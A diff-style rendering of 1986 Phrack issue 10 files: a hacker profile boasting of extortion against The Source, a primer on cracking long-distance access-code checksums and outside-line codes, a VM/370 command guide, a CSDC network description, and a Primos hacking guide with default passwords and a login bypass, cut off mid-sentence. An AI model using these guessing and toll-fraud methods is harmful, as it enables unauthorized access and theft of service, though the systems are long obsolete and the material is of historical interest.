||||
Computers: TRS-80 (4k version), Apple ][, ][+, ][e
|
||||
Sysop/Co-Sysop of: Starcom Network
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
Dave started out on The Source, and stuck with them for 6 to 8 months
|
||||
hacking around the system because the system was so slow security-wise, and of
|
||||
course, from there, he got involved with hacking Primes. One of the security
|
||||
agents named Paul from Dialcom got in contact with Dave and discussed Dave's
|
||||
hacking on The Source (his system). After talking, they found they had common
|
||||
interests, which included hacking and phreaking. Paul gave Dave his first
|
||||
code to a local dial-up for Sprint. He also led him in the direction of 8BBS,
|
||||
which brought him to meet the best of the nation's phreakers and hackers at
|
||||
the time, which included Susan Thunder, Roscoe DuPran, and Kevin Mitnick.
|
||||
Susan and Roscoe were strong friends of Dave that he personally met as well as
|
||||
Kevin, but he never met Kevin. He met Susan in the L.A. County Courthouse
|
||||
testifying against her, with Susan and Roscoe using these handles as real
|
||||
names on the charges of harassment. The phreak/hack BBS's that were most
|
||||
memorable for Dave were 8BBS and his own, Starcom Network, which had hidden
|
||||
commands for accessing the phreak section. Starcom Network was a nationally
|
||||
networked system that Dave created and operated. This was a virtual copy of
|
||||
The Source, for which he went to court over. They claimed it was their
|
||||
system, but he supressed them with a threat of publicity. Modem Over
|
||||
Manhattan was another memorable board on a TRS-80. He attributes his phreak
|
||||
knowledge to Paul from Dialcom and to The Source for his hacking ability as
|
||||
well as Susan Thunder for information on RSTS.
|
||||
|
||||
Dave Starr does intelligence and counter-intelligence work for anyone
|
||||
who has money and who is not against the United States or the views of the
|
||||
United States.
|
||||
|
||||
Dave has always operated independently, never being a member of a
|
||||
club or group, and has hand-picked his partners.
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
Interests: Telecomputing (phreaking and hacking), movies, a
|
||||
fascination with the match-making systems (Dial-Your-Match
|
||||
type systems), fun, video components.
|
||||
|
||||
Dave's Favorite Things
|
||||
----------------------
|
||||
|
||||
Women: A quiet evening with the girlfriends (NOTE: Plural).
|
||||
Cars: Mercedes 450-SL (his girlfriend's).
|
||||
Foods: Italian.
|
||||
Music: Anything excluding acid rock/heavy metal.
|
||||
Leisure: Smoking, but he hates cigarettes.
|
||||
|
||||
Most Memorable Experiences
|
||||
--------------------------
|
||||
|
||||
Bringing The Source's system to their knees.
|
||||
The Source hackers made demands of a rate of reduction to a minimum of a 33%
|
||||
decrease, which was sent with the comment, "I am in business so I understand
|
||||
the money, but you are becoming too fucking greedy." Also, an article in
|
||||
Source-World magazine was demanded, bigger than the one in the last issue
|
||||
which was to contain the following: how long they'd been on the Source, why
|
||||
they were doing this, The Source's demented point of view, their correct
|
||||
point of view, how long they have been terrorizing the Source, and an apology
|
||||
for lying to all the users that the rate increase was necessary, AND an open
|
||||
apology to The Pirate and Micronet Phantom saying sorry for all the trouble
|
||||
The Source had caused them in their quest for fair and free Sourcing. They
|
||||
wanted 2 seclev 4 accounts (normal is 3). They assured The Source that they
|
||||
could get them here for free, and low-and-behold, they could create anything,
|
||||
but they didn't want the harassment. If they did get harassed, they would
|
||||
immediately log in under seclev 7 and kill the system. The threatened that
|
||||
various accounts would be killed (all with seclev 4 and up). The Source
|
||||
person wrote, "Was this ever answered?". They then went on to say that they
|
||||
wouldn't do any more terrorizing provided that it was responded to their
|
||||
acct. within 20 minutes.
|
||||
For deleting an account, he sent back a message saying, "Fuck you". He
|
||||
explained how they were powerless against The Pirate and Micronet Phantom,
|
||||
and how The Source shouldn't even try to catch them. They were to continue
|
||||
to attack "The Empire" (The Source) until it was fair for the users.
|
||||
Numerous other letters that played to the same tune.
|
||||
|
||||
Some People to Mention
|
||||
----------------------
|
||||
|
||||
TCA Vic of The Source - Customer Service Manager/Gestapo Police
|
||||
(Who he dearly hated and always has thought of
|
||||
sticking a broomstick up his ass)
|
||||
Paul of Dialcom (Introduced him to phreaking and put his paranoia to rest)
|
||||
Susan Thunder (For teaching him RSTS and other things)
|
||||
Bruce Patton (On his rag list due to a disagreement. He received a
|
||||
electricity shut-down and a phone system shut-down of his law
|
||||
office as well as forwarding all calls to the 8BBS)
|
||||
Roscoe DuPran (For having him go to court with him and meeting Susan in
|
||||
person and for many other things [unmentionable here])
|
||||
The Pirate of Las Vegas (For his helpful continual harassment of The Source)
|
||||
Kevin Metnick (For his infrequent but helpful service)
|
||||
Larry of Modem Over Manhattan (For being there and his BBS being there)
|
||||
Bernard of 8BBS (For being there and his BBS being there)
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
I hope you enjoyed this file, look forward to more Phrack Pro-Philes coming in
|
||||
the near future. ...And now for the regularly taken poll from all interviewees.
|
||||
|
||||
Of the general population of phreaks you have met, would you consider most
|
||||
phreaks, if any, to be computer geeks? Only The Pirate, a 13 year old, fit
|
||||
this description. Thank you for your time, Dave.
|
||||
|
||||
Taran King
|
||||
Sysop of Metal Shop Private
|
127
phrack10/3.txt
Normal file
127
phrack10/3.txt
Normal file
|
@ -0,0 +1,127 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Ten, Phile #3 of 9
|
||||
|
||||
**********************************
|
||||
* The TMC Primer *
|
||||
*--------------------------------*
|
||||
* Written by: Cap'n Crax *
|
||||
*--------------------------------*
|
||||
* December 17, 1986 *
|
||||
**********************************
|
||||
|
||||
|
||||
This file was originally intended to be a "data file" of info on TMC ports,
|
||||
formulas, etc, but I decided that it would serve a better use as a "tutorial"
|
||||
of sorts. But first a bit of background info...
|
||||
|
||||
Who is TMC?
|
||||
|
||||
TMC (TeleMarketing Communications) is a long distance service serving all 50
|
||||
states. While not as well known as MCI or Sprint, they are a fairly large
|
||||
company. They are capable of setting up business communications systems,
|
||||
PBX's, and residential service. Unlike most LDC's, however, they operate on a
|
||||
"franchise" basis, which means that each franchise of the company has little
|
||||
information about any other franchise, although they do use the same lines and
|
||||
the same type of equipment.
|
||||
|
||||
So, what can they do for me?
|
||||
|
||||
Well, for most of us, TMC offers many new potentials for abuse. One of the
|
||||
primary weak points of the company is the code formats that they decided to
|
||||
use. Codes on all TMC ports are seven digits. If they were generated
|
||||
randomly, this would be a reasonably secure system from sequential code
|
||||
hacking. But TMC doesn't use random codes. Instead, they use a checksum based
|
||||
formula system, with different formulas on each port. I assume that this is
|
||||
because they wanted a wide displacement of the codes over the seven-digit
|
||||
series, so that a sequential code hacker wouldn't be able to get 2 or 3 good
|
||||
codes in a row. Or perhaps they are just very stupid. In any case, it's
|
||||
interesting that they seem to have never thought of what could happen if
|
||||
anyone ever managed to figure out any of these formulas. Anyway, that's what
|
||||
this file is about.
|
||||
|
||||
Great! What else can you tell me?
|
||||
|
||||
Well, TMC seems to use some form of the Dimension PBX system for their billing
|
||||
system (Their ads say that the switching equipment is digital). This makes
|
||||
TMC ports easily identifiable by the "Hi-Lo" bad code siren. For those who
|
||||
worry about such things, TMC is one of the "safer" companies to use. This is
|
||||
largely because, unlike "unified" companies like MCI, TMC franchises don't
|
||||
really care if another franchise is losing money. Since each franchise is
|
||||
independent of all others, there are many 800 ports, one for each franchise.
|
||||
If you use an out-of-state 800 port, you are free from such worries as ANI,
|
||||
which I have never perceived as a major threat to the code-user anyway. Also,
|
||||
TMC offers lots of opportunities for the aspiring security consultant
|
||||
(hehehe).
|
||||
|
||||
Ok, so where's some real info?
|
||||
|
||||
Right here. I am going to explain as much about TMC hacking as I can manage,
|
||||
without actually handing out codes. First, an example port. The example I am
|
||||
using is the 800 port for Louisville, KY.
|
||||
|
||||
1-800-626-9600
|
||||
|
||||
This is the port. If you are not familiar with TMC, you may want to call it
|
||||
to see what it sounds like. So let's say you call it and recognize it as a
|
||||
TMC. What next? Well, a good bet would be to run a standard "code-hack"
|
||||
program on it... Set it for seven digits, 1+ the number, and note that TMC
|
||||
codes start with 0 on more than 50% of the ports I have seen. So let's say
|
||||
that you then get this list of (fictional) codes...
|
||||
|
||||
0347589
|
||||
0347889
|
||||
0348179
|
||||
0350358
|
||||
0355408
|
||||
|
||||
At first glance, this may look like a series of "random" numbers. But, look
|
||||
closer. These numbers are based on a checksum. It is as follows...
|
||||
|
||||
Code Format: 03xabcy
|
||||
x+y=13
|
||||
(In the first code, x=4 and y=9, and, of course, 4+9=13)
|
||||
a+c=15
|
||||
(Here, a=7 and c=8, and 7+8=15)
|
||||
b=1 to 9
|
||||
(Digit "b" is unrelated to the rest of the numbers. It could, for example, be
|
||||
varied from 1-9 to possibly find more working codes)
|
||||
|
||||
Also note that 0+5 would equal 15, since the 0 is really a 10. Really!
|
||||
|
||||
Please note that the above formula is only fictional. I wouldn't want to
|
||||
possibly cause loss to TMC by giving away codes on their system!
|
||||
|
||||
Is that all?
|
||||
|
||||
No, of course not. TMC, in their love of telecom enthusiasts, has also put an
|
||||
additional prize in the Krackerjack box. The vast majority of TMC ports have
|
||||
"Outside Line" codes, which is a 2 or 3 digit number, that, when entered after
|
||||
certain codes, will give an AT&T dialtone. This is apparently a holdover from
|
||||
the fact that they are using PBX equipment. Anyway, if anyone is asking why
|
||||
you'd want an AT&T dialtone, (does anyone need to ask?) it will allow
|
||||
unrestricted calling. This, of course, means 976's, 900's, Alliance
|
||||
Teleconf., international calling, etc... Naturally, I can't list any of these,
|
||||
but I can say that if it is 2 digits, it would start with any number from 2-9
|
||||
and end in 8 or 9. If it is three digits, it will almost always start with 6,
|
||||
and be followed by any two digits. Some possible outside line codes would be
|
||||
59, 69, 89, 99, 626, 636, 628, etc... These, of course, are only examples of
|
||||
possible codes. As I mentioned, these O/S line codes are entered after the
|
||||
seven digit code. The O/S line codes only work after certain 7-digit codes,
|
||||
and from my experience, the 7-digit codes that they work with normally can't
|
||||
be used for the usual 7 digits+1+number dialing. I can find no apparent
|
||||
pattern to the codes that they do work with, so you will have to find them by
|
||||
trial-and-error.
|
||||
|
||||
What, you want more?
|
||||
|
||||
Ok, well, here's a few 800 ports...
|
||||
|
||||
1-800-433-1440 1-800-227-0073 1-800-331-9922 1-800-451-2300
|
||||
1-800-354-9379 1-800-248-4200 1-800-531-5084 1-800-351-9800
|
||||
|
||||
Closing.
|
||||
|
||||
Please note that this article is only intended as an overview of TMC and why
|
||||
they would/wouldn't be a good choice for your long distance needs. And
|
||||
goodness me, don't use any of this information in an illegal way!
|
169
phrack10/4.txt
Normal file
169
phrack10/4.txt
Normal file
|
@ -0,0 +1,169 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Ten, Phile #4 of 9
|
||||
|
||||
A Beginner's Guide to:
|
||||
The IBM VM/370
|
||||
(or what to do once you've gotten in)
|
||||
|
||||
A monograph by Elric of Imrryr
|
||||
Presented by Lunatic Labs UnLimted.
|
||||
|
||||
KopyRite (K) 1986
|
||||
RePrint what you like
|
||||
Note: This file is formatted for printing
|
||||
on a 80 Column, 55 line printer.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
PREFACE: What this guide is about.
|
||||
This was written to help Hackers learn to basics of how to function on an
|
||||
IBM VM/370. Not as a guide on how to get in, but on how to use it one
|
||||
you have gotten in.
|
||||
Comments on this are welcome at RIPCO 312-528-5020.
|
||||
Note: To VM/370 Hackers, feel free to add to this file, just give myself
|
||||
& Lunatic Labs credit for our parts.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
PART 1: Logging in & out
|
||||
When you connect to a VM/370 system hit RETURN till you see:
|
||||
|
||||
VM/370
|
||||
!
|
||||
|
||||
To logon you type:
|
||||
logon userid ('logon' may be abbreviated to 'l')
|
||||
If you enter an invalid userid, It will respond with a message:
|
||||
'userid not in cp directory'.
|
||||
If it is valid you with get:
|
||||
ENTER PASSWORD:
|
||||
Enter your password, then your in, hopefully....
|
||||
|
||||
Logging Out:
|
||||
Type:
|
||||
log
|
||||
|
||||
PART 2: Loading CMS & Getting set up
|
||||
When you logon, if you do not see the message 'VM/SP CMS - (date) (time)
|
||||
you will need to load 'CMS' (CMS in a command interpreter).
|
||||
Type:
|
||||
cp ipl cms
|
||||
You should then see something like this:
|
||||
R; T=0.01/0.01 08:05:50
|
||||
|
||||
Now you will be able to use both CP & CMS commands...
|
||||
Some system my think you are using an IBM 3270 Terminal, if you can
|
||||
emulate a 3270 (for example with Crosstalk) do so, if not type:
|
||||
set terminal typewriter or set terminal dumb
|
||||
|
||||
PART 3: Files
|
||||
You can list your files by typing:
|
||||
filelist
|
||||
|
||||
Wildcards can be used, so:
|
||||
filelist t*
|
||||
list all files beginning with a 't'.
|
||||
Filenames are made up of a FILENAME and FILETYPE
|
||||
|
||||
You can list a file by typing:
|
||||
listfile filename filetype
|
||||
|
||||
Other file commands are: copyfile, erase, and rename, they all work with
|
||||
FILENAME FILETYPE.
|
||||
|
||||
PART 4: Editing your files
|
||||
I'm going to keep this down to the basics and only discuss one editor
|
||||
XEDIT. To use XEDIT type:
|
||||
xedit filename filetype
|
||||
Once in XEDIT, enter the command 'input' to enter text, hit a RETURN on
|
||||
a blank line to return to command mode, then enter the command 'FILE' to
|
||||
save your file.
|
||||
|
||||
PART 5: Communicating with others on the system
|
||||
Sending & receiving 'NOTES':
|
||||
To send a 'NOTE' to another user type:
|
||||
note userid
|
||||
|
||||
You will then be in the XEDIT subsystem, see PART 4.
|
||||
Once you are done writing your NOTE, save the file and type:
|
||||
send note
|
||||
|
||||
This will send the NOTE to userid.
|
||||
You can also use the SEND command to send other files by typing:
|
||||
send filename filetype userid.
|
||||
|
||||
Sending messages:
|
||||
You can use the TELL command to communicate with a user who is current
|
||||
logged on, type:
|
||||
tell userid Help me!
|
||||
|
||||
PART 6: Getting Help
|
||||
Type:
|
||||
help
|
||||
|
||||
That's it, good luck.
|
229
phrack10/5.txt
Normal file
229
phrack10/5.txt
Normal file
|
@ -0,0 +1,229 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Ten, Phile #5 of 9
|
||||
|
||||
^ ^
|
||||
[<+>] [<+>]
|
||||
/|-|\ /|-|\
|
||||
\|P|/>/>/>/>/>/>/>/>/>PLP<\<\<\<\<\<\<\<\<\|P|/
|
||||
|h| ^ ^ |h|
|
||||
|a| ]+[The Executioner]+[ |a|
|
||||
|n| |n|
|
||||
|t| Call Phreak Klass, Room 2600 |t|
|
||||
|o| [806][799][0016] |o|
|
||||
|m| |m|
|
||||
|s| [Circuit Switched Digital Capability] |s|
|
||||
|-| ----------------------------------- |-|
|
||||
|S| |S|
|
||||
|e| Part I of II in this series of files |e|
|
||||
|x| |x|
|
||||
|y| Written for PHRACK, Issue 10. |y|
|
||||
/|-|\ /|-|\
|
||||
\|$|/>/>/>/>/>/>/>/>/>PLP<\<\<\<\<\<\<\<\<\|$|/
|
||||
[<+>] [<+>]
|
||||
|
||||
========
|
||||
=Part I=
|
||||
========
|
||||
|
||||
|
||||
The Circuit Switch Digital Capability (CSDC) allows for the end to end digital
|
||||
transmission of 56 kilobits per second (kb/s) data and, alternately, the
|
||||
transmission of analog voice signals on a circuit switched basis.
|
||||
|
||||
=====================
|
||||
=Network Perspective=
|
||||
=====================
|
||||
|
||||
|
||||
The CSDC feature was formerly known as PSDC (Public Switched Digital
|
||||
Capability). These two terms can be used synonymously. The CSDC feature
|
||||
provides an alternate voice/data capability. If a SLC Carrier System 96 is
|
||||
used, digital signals are transmitted by T1 signal. If the loop is a two wire
|
||||
loop, the CSDC feature utilizes time compression multi-plexing (TCM) which
|
||||
allows for the transmission of digital signals over a common path using a
|
||||
separate time interval for each direction. During a CSDC call an end user may
|
||||
alternate between the voice and data modes as many times as desired. The CSDC
|
||||
feature can support sub-variable data rates from customer premises equipment,
|
||||
but a 56 kb/s rate is utilized in the network. Some possible applications of
|
||||
the CSDC feature are:
|
||||
|
||||
1. Audiographic Teleconferencing.
|
||||
2. Secure Voice.
|
||||
3. Facsimile.
|
||||
4. Bulk Data.
|
||||
5. Slow scan television.
|
||||
|
||||
The ESS switch provides end user access and performs signalling, switching,
|
||||
and trunking functions between the serving ESS switch and other CSDC offices.
|
||||
End users of CSDC require a network channel terminating equipment circuit
|
||||
(NCTE) which is the SD-3C476 or its equivalent. End user access is over 2-wire
|
||||
metallic loops terminating at the metallic facility terminal (MFT) or SLC
|
||||
Carrier System. End users not served directly by a direct CSDC ESS office, can
|
||||
access CSDC equipment through a RX (Remote Exchange) access arrangement via
|
||||
use of a D4 Carrier System and if required, a SLC Carrier System. The
|
||||
T-Carrier trunks serve for short haul transmissions while long haul
|
||||
transmissions are served by digital microwave radio and other digital systems.
|
||||
|
||||
If the NCTE interface is used with customer premises equipment, a miniature
|
||||
8-position series jack is used to connect the NCTE to other equipment. The
|
||||
jack pins are paired off; data transmit pair, data receive pair, a voice pair,
|
||||
and a mode switch pair. The data pairs support the simultaneous transmission
|
||||
and reception of digital data in a bipolar format at 56 kb/s. The data pairs
|
||||
also provide for the xmission of control information to and from the network.
|
||||
The voice pairs supports analog signal transmission and provides for call
|
||||
setup, disconnect and ringing functions. The mode control pair provides
|
||||
signals to the network when a change in mode (voice to data/data to voice) is
|
||||
requested by the customer.
|
||||
|
||||
A CSDC call is originated over a 2-wire loop which can also be used for
|
||||
Message Telecommunication Service (MTS) calls. Lines may be marked (MTS/CSDC
|
||||
or CSDC only). Touch tone is needed to originate a CSDC call. Originations may
|
||||
be initiated manually or with Automatic Calling Equipment (ACE) if available.
|
||||
Digit reception, transmission and signalling follow the same procedures used
|
||||
for a MTS outgoing call on CCIS or non-CCIS trunks. However CSDC calls are
|
||||
ALWAYS routed over digital transmission facilities.
|
||||
|
||||
|
||||
|
||||
The long term plan also allows for EA-MF (Equal Access-Multi Frequency)
|
||||
signalling and improved automatic message accounting (AMA) records. A CSDC
|
||||
call is screened to ensure that the originating party has CSDC service and
|
||||
that the carrier to be used provides 56 kb/s voice/data capability. A blocked
|
||||
call is routed to a special service error announcement. Non-CSDC calls are not
|
||||
allowed to route over CSDC-only carriers. Non-payer screening is not allowed
|
||||
for CSDC calls using CCIS signalling.
|
||||
|
||||
A CSDC call is routed directed to the carrier or indirectly via the Access
|
||||
Tandem (AT) or Signal Conversion Point (SCP). The call is terminated directly
|
||||
from the carrier to the end office or indirectly via the AT or SCP. Signalling
|
||||
for direct routing is either CCIS or EA-MF and is assigned on a trunk group
|
||||
basis.
|
||||
|
||||
The AT is an ESS switch which allows access to carriers from an end office
|
||||
without requiring direct trunks. Signalling between end offices and the AT is
|
||||
either EA-MF or CCIS. Trunks groups using EA-MF signalling can have combined
|
||||
carrier traffic. Separate trunk groups for each carrier are required for CCIS
|
||||
signalling.
|
||||
|
||||
The SCP is an ESS switch which allows access to carriers using only CCIS
|
||||
signalling from offices without the CCIS capability. Separate trunk groups for
|
||||
each carrier are used between the originating end office and the SCP. Separate
|
||||
trunk groups are optional between the SCP and the terminating end office and
|
||||
the terminating end office. Signalling between the end office and the SCP is
|
||||
MF. The SCP must have direct connection to the carrier using CCIS signalling.
|
||||
|
||||
=========================
|
||||
=Remote Switching System=
|
||||
=========================
|
||||
|
||||
The RSS can be used as a remote access point for CSDC. The compatibility of
|
||||
RSS and CSDC improves the marketability of both features. The RSS design
|
||||
allows a provision for the support of D4 special service channel bank
|
||||
plug-ins. This provision allows for such applications as off premises
|
||||
extensions, foreign exchanges lines, and private lines. Thus the RSS can be
|
||||
used as a CSDC access point in a configuration similar to the CSDC RX
|
||||
arrangement.
|
||||
|
||||
================
|
||||
=Centrex/ESSX-1=
|
||||
================
|
||||
|
||||
The CSDC feature is optionally available to Centrex/ESSX-1 customers. Most of
|
||||
the capabilities of Centrex service can be applied to Centrex lines that have
|
||||
been assigned the CSDC feature. In voice mode, the Centrex/CSDC line can
|
||||
exercise any of the Centrex group features that have been assigned to the
|
||||
line. In the voice/data mode, several Centrex features are inoperable or
|
||||
operate only on certain calls. The CSDC feature can be provided for a Centrex
|
||||
group as follows:
|
||||
|
||||
1. Message Network Basis (MTS)
|
||||
2. IntraCentrex group basis
|
||||
3. InterCentrex group basis
|
||||
4. Any combination of the above
|
||||
|
||||
===============================
|
||||
=User Perspective for the CSDC=
|
||||
===============================
|
||||
|
||||
To establish a CSDC call, a CSDC user goes off hook, receives dial tone and
|
||||
dials. The dialing format for the CSDC/MTS is as follows for interim plan:
|
||||
|
||||
#99 AB (1+) 7 or 10 digits (#)
|
||||
|
||||
The customer dials '#99' to access the CSDC feature. The 'AB' digits are the
|
||||
carrier designation code. No dial tone is returned after the 'AB' digits. The
|
||||
1+ prior to the 7 or 10 digit directory number must be used if it is required
|
||||
for MTS calls. The '#' at the end is optional, if it is not dialed, end of
|
||||
dialing is signalled by a time-out.
|
||||
|
||||
The long term dialing format for the CSDC/MTS is as follows:
|
||||
|
||||
#56 (10XXX) (1+) 7 or 10 digits (#)
|
||||
|
||||
Dialing '#56' indicates 56kb/s alternate voice/data transmission. the '10XXX'
|
||||
identifies the carrier to be used for the call. If '10XXX' is not dialed on an
|
||||
inter-LATA call, the primary carrier of the subscriber is used. If '10XXX' is
|
||||
not dialed on an intra-LATA call, the telco handles the call. The long term
|
||||
plan also allows for several abbreviated forms. Dialing '#56 10XXX #' is
|
||||
allowed for routing a call which prompts the customer to dial according to the
|
||||
carrier dialing plan. Dialing '#56 10XXX' followed by a speed call is also
|
||||
allowed. If a customer has pre-subscribed to a carrier which can carry CSDC
|
||||
calls and the CSDC access code is stored as part of the speed calling number,
|
||||
the customer dials the speed calling code to make a CSDC call.
|
||||
|
||||
Regular ringing is applied to the called line and audible ringing is applied
|
||||
to the calling terminal. Once the voice connection is established, either
|
||||
party can initiate the switch to data mode, if desired. To initiate a change
|
||||
in mode a CSDC user must initiate a mode switch command via a closure of the NCT
|
||||
|
||||
An example of a mode switch:
|
||||
|
||||
Suppose party A wants to switch to data. Party A issues a mode switch
|
||||
command and receives a signal called far end voice (FEV) which is a bipolar
|
||||
sequence (2031 hz at 60 ipm). Party A may now hang up the handset at any time
|
||||
after initiating the mode switch command. Party B receives a far end data
|
||||
(FED) tone (2031 Hz at 39 ipm) indicating party A wants to switch to data. If
|
||||
party B agrees to switch to data, party B must initiate a mode switch command.
|
||||
Party B may nor hang up the handset. Data transmission is now possible.
|
||||
To switch to the voice mode, anyone can initiate it. To switch, party A
|
||||
would pick up the handset and initiate a mode switch command and will receive
|
||||
the FED tone. Party B receives the FEV tone indicating that party A wants to
|
||||
go voice. Party B must now pick up the hand set and initiate a mode switch
|
||||
command. To terminate a call, either party may just leave the handset on and
|
||||
indicate a mode switch. If termination is issued during a mode conflict, time
|
||||
out will disconnect the call, usually about 10 or 11 seconds.
|
||||
|
||||
Centrex/ESSX-1 customers may utilize the CSDC service in several ways if they
|
||||
have CSDC terminals with the necessary on premises equipment. The standard
|
||||
CSDC call is initiated by dialing the message network access code, (9). The
|
||||
dialing sequence is then identical to the plan for MTS:
|
||||
|
||||
#99 AB (1+) 7 or 10 digits (interim plan)
|
||||
|
||||
#56 (10XXX) (1+) 7 or 10 digits (#) (long term plan)
|
||||
|
||||
The dialing pattern to establish interCentrex or intraCentrex CSDC calls is as
|
||||
follows:
|
||||
|
||||
CSDC access code + extension
|
||||
|
||||
An intraCentrex/CSDC call is initiated by dialing the trunk access code
|
||||
assigned to route a loop-around Centrex/CSDC trunk group. Next, the extension
|
||||
of the desired station is dialed. To establish an interCentrex call a
|
||||
different trunk access code must be used to route the CSDC calls to another
|
||||
Centrex group instead of a station.
|
||||
|
||||
The CSDC maintenance circuit has a dialable digital loopback. This loopback is
|
||||
very useful in CSDC testing. A customer can check their access line by dialing
|
||||
the test DN. The loop is automatically activated when the call is answered.
|
||||
|
||||
================
|
||||
=End of Part I.=
|
||||
================
|
||||
|
||||
Part II: The CSDC hardware, and office data structures.
|
||||
|
||||
=======================================================
|
||||
= (c) 1986 The Executioner and The PhoneLine Phantoms =
|
||||
=======================================================
|
327
phrack10/6.txt
Normal file
327
phrack10/6.txt
Normal file
|
@ -0,0 +1,327 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Ten, Phile #6 of 9
|
||||
|
||||
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
|
||||
! !
|
||||
# Hacking Primos Part I #
|
||||
! !
|
||||
# By Evil Jay #
|
||||
! !
|
||||
# Phone Phreakers of America #
|
||||
! !
|
||||
# (C) 1986-87 #
|
||||
! !
|
||||
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
|
||||
|
||||
|
||||
Author Note:
|
||||
|
||||
I should begin by saying that there are other files out there about hacking
|
||||
Primos, one written recently, that basically tell you nothing at all as far as
|
||||
in-depth Primos is concerned. Those files should be deleted and this put in
|
||||
its place. This is the first in many files on Primos, and I will go into many
|
||||
topics, such as the on-line network, the different subsystems and other
|
||||
subjects. Hope you enjoy!
|
||||
|
||||
|
||||
*** Gaining Entry Part 1 ***
|
||||
|
||||
Gaining entry, as always, is the hardest part.
|
||||
|
||||
When you call a Primos system it will connect with something like this:
|
||||
|
||||
|
||||
PRIMENET 19.2.7F PPOA1
|
||||
|
||||
|
||||
If it doesn't give a welcome msg like above trying typing something like
|
||||
"XXZZZUUU" and hit return and it should come back with:
|
||||
|
||||
Invalid command "XXZZZUUU". (logo$cp)
|
||||
Login please.
|
||||
ER!
|
||||
|
||||
To login you type:
|
||||
|
||||
LOGIN <USER ID> <RETURN/ENTER>
|
||||
|
||||
Or Just:
|
||||
|
||||
LOGIN <RETURN/ENTER>
|
||||
(Then it will ask for your "User ID?")
|
||||
|
||||
|
||||
User ids differ from system to system but there are ALWAYS default accounts to
|
||||
try. For "User ID?" try...
|
||||
|
||||
SYSTEM (This is the operators account and with it you can usually do
|
||||
anything.)
|
||||
LIB
|
||||
DOS
|
||||
|
||||
After you enter your User ID it will prompt you with:
|
||||
|
||||
Password?
|
||||
|
||||
This is of course, where you enter your password. For SYSTEM try...
|
||||
|
||||
SYSTEM
|
||||
SYSMAN
|
||||
NETLINK
|
||||
PRIMENET
|
||||
MANAGER
|
||||
OPERATOR
|
||||
|
||||
And anything else you can think of. These are just common passwords to these
|
||||
defaults.
|
||||
|
||||
For LIB try...
|
||||
|
||||
LIBRARY
|
||||
SYSLIB
|
||||
LIB
|
||||
SYSTEM
|
||||
|
||||
For DOS try...
|
||||
|
||||
DOS
|
||||
SYSDOS
|
||||
SYSTEM
|
||||
|
||||
Etc...Just use your brain.
|
||||
|
||||
|
||||
*Older Versions*
|
||||
|
||||
On older versions of Primos, 18 and below, you could enter one of the system
|
||||
defaults above and hit CTRL-C once or twice for the password and it would drop
|
||||
you into the system. Whether this is a bug or intentional I don't really have
|
||||
any idea. But it does work sometimes. To see what ver of Primos your trying to
|
||||
logon to just look at the welcome message when you logon:
|
||||
|
||||
PRIMENET 19.2.7F PPOA1
|
||||
|
||||
19 is the version number. So thus, if you were logging on to this particular
|
||||
Prime you would NOT be able to use the above mentioned bug/default-password.
|
||||
|
||||
By the way, if you do not know what version it is (because it did not give you
|
||||
a welcome msg when you connected...try to do the above mentioned anyway.)
|
||||
|
||||
|
||||
Now, if it says:
|
||||
|
||||
|
||||
Invalid user id or password; please try again.
|
||||
|
||||
|
||||
Then you must try a different password. Notice, that the system informs you
|
||||
that either the User ID, the password or both are wrong. Don't worry about
|
||||
this...just hack the defaults. There have been a lot of rumors spreading
|
||||
around about common defaults such as: PHANTOM, PRIMOS, PRIME & FAM, but I
|
||||
believe this to be a load of shit. I have never seen a system with these
|
||||
defaults on them. But, as far as PRIMOS and PRIME go, these are sometimes
|
||||
common accounts but I really don't believe that they are defaults. Also try
|
||||
accounts like DEMO & GUEST. These are sometimes common accounts (but never
|
||||
very often).
|
||||
|
||||
Primos does not have limited commands before logon such as Tops 20 and DEC. So
|
||||
hacking a Primos is really nothing but taking a guess.
|
||||
|
||||
|
||||
** No passwords **
|
||||
|
||||
Some users have been known to use a carriage return for their password which
|
||||
in other words means, once you enter your user id, your logged in without
|
||||
having to enter a password. Sometimes, these are default passwords assigned by
|
||||
the system operator, but that is rare. If you can get the format (perhaps you
|
||||
already have any account) for the regular user id's, then try passwords like:
|
||||
|
||||
NETLINK
|
||||
SYSTEM
|
||||
PRIME
|
||||
PRIMENET
|
||||
PRIMOS
|
||||
|
||||
And other typical user passwords like sex, hot, love...etc. Most female users
|
||||
that I have talked to on a local university prime all seem to have picked
|
||||
account that have something to do with sex...sex being the most popular.
|
||||
|
||||
|
||||
** The Format **
|
||||
|
||||
The format for a user id can be just about ANYTHING the operators or system
|
||||
owners want...and they are usually random looking things that make no sense.
|
||||
They can be a combination of numbers, numbers and I am almost sure CTRL
|
||||
characters can be used. Lower & Upper case do not matter...the system, changes
|
||||
all lower case entry to upper case. Passwords can be anything up to 16
|
||||
characters in length.
|
||||
|
||||
|
||||
** Your In! **
|
||||
|
||||
If you get a valid ID/Password you will see something like this:
|
||||
|
||||
|
||||
|
||||
PPOA1 (user 39) logged in Monday, 15 Dec 86 02:29:16.
|
||||
Welcome to PRIMOS version 19.4.9.
|
||||
Last login Friday, 12 Dec 86 08:29:04.
|
||||
|
||||
|
||||
Congratulate yourself, you just did something that should be called something
|
||||
of an achievement!
|
||||
|
||||
The next part will deal with very basic commands for beginners. I would like
|
||||
to end this part with a few more words. Yes, Primos is hard to hack, but given
|
||||
the time and patience almost every system has those basic demo accounts and
